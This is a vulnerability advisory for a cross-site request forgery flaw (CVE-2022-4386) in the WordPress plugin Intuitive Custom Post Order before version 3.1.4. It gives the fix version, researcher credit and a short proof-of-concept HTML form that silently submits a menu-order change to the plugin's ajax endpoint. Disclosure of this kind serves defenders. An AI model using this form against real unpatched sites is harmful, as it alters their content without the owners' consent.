Intuitive Custom Post Order < 3.1.4 – Arbitrary Menu Order Update via CSRF | CVE 2022-4386 | Plugin Vulnerabilities

Description

The plugin lacks CSRF protection in its update-menu-order ajax action, allowing an attacker to trick any user to change the menu order via a CSRF attack

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="update-menu-order" />
      <input type="hidden" name="order" value="post[]=7&post[]=5" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

intuitive-custom-post-order

Fixed in 3.1.4

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Yuya Kotake

Submitter

Yuya Kotake

Submitter twitter

https://twitter.com/elmore_mk2

Verified

Yes

WPVDB ID

734064e3-afe9-4dfd-8d76-8a757cc94815

Timeline

Publicly Published

2023-01-24 (about 3 years ago)

Added

2023-01-24 (about 3 years ago)

Last Updated

2023-02-24 (about 2 years ago)

Other

Published

Title

Published

2025-12-28

Title

Popup box < 6.0.8 - Cross-Site Request Forgery

Published

2019-12-26

Title

bbPress Members Only < 1.3.1 - CSRF on Optional Settings page

Published

2024-01-31

Title

W3SPEEDSTER < 7.20 - Settings Update via CSRF

Published

2023-01-27

Title

Booking calendar, Appointment Booking System < 3.2.4 - Form Creation/Update/Deletion/Duplication via CSRF

Published

2025-01-07

Title

Prayer Times Anywhere <= 2.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting